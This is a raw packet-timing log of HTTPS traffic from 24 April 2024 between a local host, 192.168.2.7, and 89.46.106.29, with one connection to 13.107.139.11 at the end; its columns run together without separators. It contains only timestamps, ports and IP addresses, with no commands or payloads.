                                                                                                                          Apr 24, 2024 06:45:28.665523052 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.665565968 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:28.666637897 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.666654110 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.666733980 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:28.666743040 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.666784048 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:28.667526007 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.667541981 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.667587996 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:28.667593956 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.667629957 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:28.667650938 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:28.749830008 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.749857903 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.749982119 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:28.749996901 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.750042915 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:28.750895023 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.750910044 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.750967979 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:28.750976086 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.751036882 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:28.982506037 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.982517958 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.982551098 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.982615948 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:28.982626915 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.982656956 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:28.982682943 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:28.983331919 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.983347893 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.983408928 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:28.983417034 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.983470917 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:28.984191895 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.984208107 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.984270096 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:28.984276056 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.984321117 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:28.984991074 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.985011101 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.985044003 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:28.985050917 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.985102892 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:28.985102892 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:28.986037016 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.986052036 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.986150026 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:28.986155987 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.986197948 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:28.987032890 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.987047911 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.987103939 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:28.987112045 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.987149000 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:28.987833023 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.987849951 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.987895012 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:28.987901926 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.987941027 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:28.987967968 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:28.988779068 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.988794088 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.988831997 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:28.988838911 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.988862038 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:28.988888025 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.068779945 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.068799019 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.068909883 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.068948030 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.068993092 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.069993973 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.070009947 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.070060015 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.070080042 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.070122004 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.071002960 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.071018934 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.071067095 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.071074009 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.071110010 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.071804047 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.071820021 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.071876049 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.071882963 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.071923971 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.072911024 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.072928905 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.072990894 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.072997093 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.073035002 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.301213980 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.301223040 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.301254988 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.301326990 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.301337004 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.301347971 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.301392078 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.302270889 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.302288055 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.302359104 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.302366972 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.302412033 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.303030014 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.303045988 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.303107023 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.303113937 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.303148031 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.304012060 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.304027081 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.304075003 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.304083109 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.304105043 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.304133892 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.304835081 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.304852009 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.304951906 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.304958105 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.304999113 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.305660963 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.305677891 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.305742025 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.305747986 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.305787086 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.306668997 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.306685925 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.306725979 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.306746006 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.306768894 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.306783915 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.307312965 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.307328939 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.307382107 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.307389021 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.307424068 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.308296919 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.308336973 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.308362007 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.308367968 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.308403969 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.308428049 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.309854031 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.309874058 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.309922934 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.309928894 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.309983015 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.309995890 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.311034918 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.311053038 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.311113119 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.311119080 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.311162949 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.311959982 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.311980009 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.312022924 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.312028885 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.312062025 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.312077999 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.312935114 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.312953949 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.313010931 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.313021898 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.313066006 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.313801050 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.313817024 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.313879013 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.313885927 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.313921928 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.314676046 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.314691067 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.314750910 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.314755917 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.314790964 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.386143923 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.386164904 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.386229992 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.386244059 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.386287928 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.386307001 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.387232065 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.387259960 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.387305975 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.387311935 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.387358904 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.388020992 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.388037920 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.388221025 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.388227940 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.388268948 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.388988018 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.389004946 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.389050007 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.389056921 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.389080048 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.389101982 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.389722109 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.389739037 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.389801025 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.596126080 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.649704933 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:29.860126972 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:29.860243082 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:30.284126997 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:30.284212112 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:30.405590057 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:30.405603886 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:30.405620098 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:30.405657053 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:30.405663967 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:30.405682087 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:30.405705929 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:30.405718088 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:30.405723095 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:30.405735970 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:30.405750990 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:30.405759096 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:30.405803919 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:30.405811071 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:30.405832052 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:30.405841112 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:30.405848980 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:30.405879021 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:30.405889034 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:30.405900002 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:30.405910969 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:30.405939102 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:30.405949116 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:30.406014919 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:30.406030893 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:30.406039953 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:30.406147957 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:30.406227112 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:30.406879902 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:30.406887054 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:30.406949043 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:30.407145023 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:30.407160997 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:30.407179117 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:30.407195091 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:30.407205105 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:30.407226086 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:30.407322884 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:30.407339096 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:30.407393932 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:30.407413960 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:30.407427073 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:30.407464981 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:30.407496929 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:30.407510996 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:30.407525063 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:30.407541037 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:30.407587051 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:30.407603979 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:30.407605886 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:30.407624006 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:30.407668114 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:30.407669067 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:30.407687902 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:30.407720089 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:30.407727957 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:30.407738924 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:30.407742977 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:30.407767057 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:30.407805920 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:30.407814980 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:30.407828093 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:30.407872915 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:30.407891989 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:30.407912970 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:30.407921076 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:30.407941103 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:30.407943010 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:30.407960892 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:30.408003092 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:30.408010960 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:30.408020973 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:30.408035994 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:30.408036947 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:30.408066034 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:30.408072948 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:30.408087969 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:30.408111095 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:30.408121109 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:30.408128977 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:30.408135891 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:30.408168077 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:30.408174038 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:30.408191919 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:30.408229113 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:30.408242941 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:30.408682108 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:30.408695936 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:30.408772945 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:30.408864021 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:30.408868074 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:30.408890963 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:30.408916950 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:30.408931017 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:30.409025908 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:30.409080029 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:30.409795046 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:30.409878969 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:30.410486937 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:32.146287918 CEST49715443192.168.2.713.107.139.11
                                                                                                                          Apr 24, 2024 06:45:32.146337032 CEST4434971513.107.139.11192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:32.146431923 CEST49715443192.168.2.713.107.139.11
